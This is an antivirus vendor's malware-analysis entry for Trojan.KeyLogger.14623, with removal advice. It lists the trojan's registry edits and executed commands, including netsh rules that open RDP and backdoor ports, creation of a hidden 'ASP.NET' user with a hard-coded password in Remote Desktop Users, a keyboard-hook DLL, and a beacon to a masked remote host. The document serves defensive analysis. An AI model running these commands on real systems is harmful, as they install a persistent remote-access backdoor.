Для коректної роботи нашого сайта необхідно включити підтримку JavaScript у Вашому браузері.
Trojan.KeyLogger.14623
Добавлен в вирусную базу Dr.Web:
2012-07-31
Описание добавлено:
2012-08-21
Техническая информация
Для обеспечения автозапуска и распространения:
Создает следующие сервисы:
[<HKLM>\SYSTEM\ControlSet001\Services\PlugAndPlay] 'ImagePath' = '%APPDATA%\svchost.exe -service -debug'
[<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\TestService] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\PlugAndPlay] 'Start' = '00000002'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\mstsc.exe' = '<SYSTEM32>\mstsc.exe:*:Enabled:Подключение к удаленному рабочему столу'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\sessmgr.exe' = '<SYSTEM32>\sessmgr.exe:*:Enabled:Удаленный рабочий стол'
Создает и запускает на исполнение:
Запускает на исполнение:
<SYSTEM32>\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f
<SYSTEM32>\net1.exe start TermService
<SYSTEM32>\reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 10 /f
<SYSTEM32>\net1.exe user ASP.NET 7gti201hg /add /EXPIRES:NEVER /active:yes
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Services\TermService" /v Start /t REG_DWORD /d 2 /f
<SYSTEM32>\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
<SYSTEM32>\mnmsrvc.exe
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
<SYSTEM32>\net1.exe start FastUserSwitchingCompatibility
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
<SYSTEM32>\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ASP.NET /t REG_DWORD /d 0 /f
<SYSTEM32>\reg.exe DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v "X509 Certificate" /f
<SYSTEM32>\net1.exe accounts /maxpwage:unlimited
<SYSTEM32>\reg.exe DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v "X509 Certificate ID" /f
<SYSTEM32>\reg.exe ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" /v 2500 /t REG_DWORD /d 3 /f
<SYSTEM32>\reg.exe DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects" /f
<SYSTEM32>\reg.exe DELETE "HKLM\System\CurrentControlSet\Services\TermService\Parameters" /v Certificate /f
<SYSTEM32>\reg.exe DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v GinaDLL /f
<SYSTEM32>\net1.exe localgroup %USERNAME%s ASP.NET /add
<SYSTEM32>\net1.exe localgroup "Пользователи удаленного рабочего стола" ASP.NET /add
<SYSTEM32>\net1.exe localgroup "Remote Desktop Users" ASP.NET /add
<SYSTEM32>\reg.exe DELETE "HKLM\SOFTWARE\Microsoft\MSLicensing\Store" /f
<SYSTEM32>\netsh.exe firewall add allowedprogram "%APPDATA%\hvnc2.exe" "Служба сетевых подключений"
<SYSTEM32>\netsh.exe firewall add allowedprogram "%APPDATA%\svchost.exe" "Служба сетевого доступа к файлам и принтерам"
<SYSTEM32>\netsh.exe firewall add allowedprogram "<SYSTEM32>\mstsc.exe" "Подключение к удаленному рабочему столу"
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 3389 name = TCP3389
<SYSTEM32>\netsh.exe firewall add allowedprogram "<SYSTEM32>\sessmgr.exe" "Удаленный рабочий стол"
<SYSTEM32>\reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_DWORD /d 0 /f
<SYSTEM32>\sc.exe start TestService
<SYSTEM32>\sc.exe create "TestService" displayname= "HTTPS Service" binpath= "%APPDATA%\lsass.exe" type= own start= auto error= ignore
<SYSTEM32>\sc.exe create "PlugAndPlay" displayname= "PlugAndPlay" binpath= "%APPDATA%\svchost.exe -service -debug" type= own start= auto error= ignore
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
<SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "%APPDATA%\svchost.exe -service -debug" /f
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 31337 name = TCP31337
<SYSTEM32>\sc.exe start "PlugAndPlay"
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 5932 name = TCP5932
<SYSTEM32>\sc.exe start mnmsrvc
<SYSTEM32>\sc.exe Start TermService
<SYSTEM32>\sc.exe Start TlntSvr
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 5931 name = TCP5931
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 8080 name = TCP8080
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 80 name = TCP80
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 443 name = TCP443
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 5900 name = TCP5900
<SYSTEM32>\netsh.exe firewall add portopening protocol = TCP port = 5800 name = TCP5800
Внедряет код в
следующие системные процессы:
Устанавливает процедуры перхвата сообщений
о нажатии клавиш клавиатуры:
Библиотека-обработчик для всех процессов: %APPDATA%\core.dll
Изменяет следующие настройки браузера Windows Internet Explorer:
[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '2500' = '00000003'
Изменения в файловой системе:
Создает следующие файлы:
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\_hello[1].php
%APPDATA%\core.dll
%APPDATA%\lsass.exe
Присваивает атрибут 'скрытый' для следующих файлов:
%APPDATA%\core.dll
%APPDATA%\lsass.exe
Сетевая активность:
Подключается к:
'www.at##che.lt':80
'localhost':4455
TCP:
Запросы HTTP GET:
www.at##che.lt/_hello.php?pa#########################################################################################################################################################
www.at##che.lt/
UDP:
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Завантажте Dr.Web для Android
Безкоштовно на 3 місяці
Всі компоненти захисту
Подовження демо в AppGallery/Google Pay
Подальший перегляд даного сайта означає, що Ви погоджуєтесь на використання нами cookie-файлів та інших технологій збору статистичних відомостей про відвідувачів. Докладніше
OK